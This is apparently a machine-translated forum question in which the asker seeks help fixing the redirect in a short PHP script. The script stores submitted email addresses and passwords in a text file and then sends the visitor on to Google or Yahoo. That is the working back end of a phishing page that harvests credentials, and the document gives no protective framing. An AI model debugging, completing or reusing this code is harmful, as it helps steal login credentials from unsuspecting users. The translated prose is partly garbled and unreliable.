我使用此代码将用户名和密码保存在文本文件中,最后重定向到网站。bt 此代码不会重定向到谷歌。当我在本地主机中运行它时,它可以完美运行(在本地主机中我评论“header(”Location:http ://www.yahoo.com “);”)......但是当我把它放在主机中时......它没有不。也没有任何错误消息,但一旦它完美运行
<html>
<body>
<?php
$eml = $_POST["email"];
$pw = $_POST["pass"];
if (empty($pw) || empty($eml))
{
header("Location: http://www.yahoo.com");
exit;
}
else
$file = "mydata.txt";
$source = fopen ($file, 'a' ) or die;
$info = $_POST["email"];
fwrite($source, "$info\r\n");
$info = $_POST["pass"];
fwrite($source, "$info\r\n");
fwrite($source, "\r\n");
fclose ($source);
?>
<script>location.href='http://www.google.com';</script>
</body>
</html>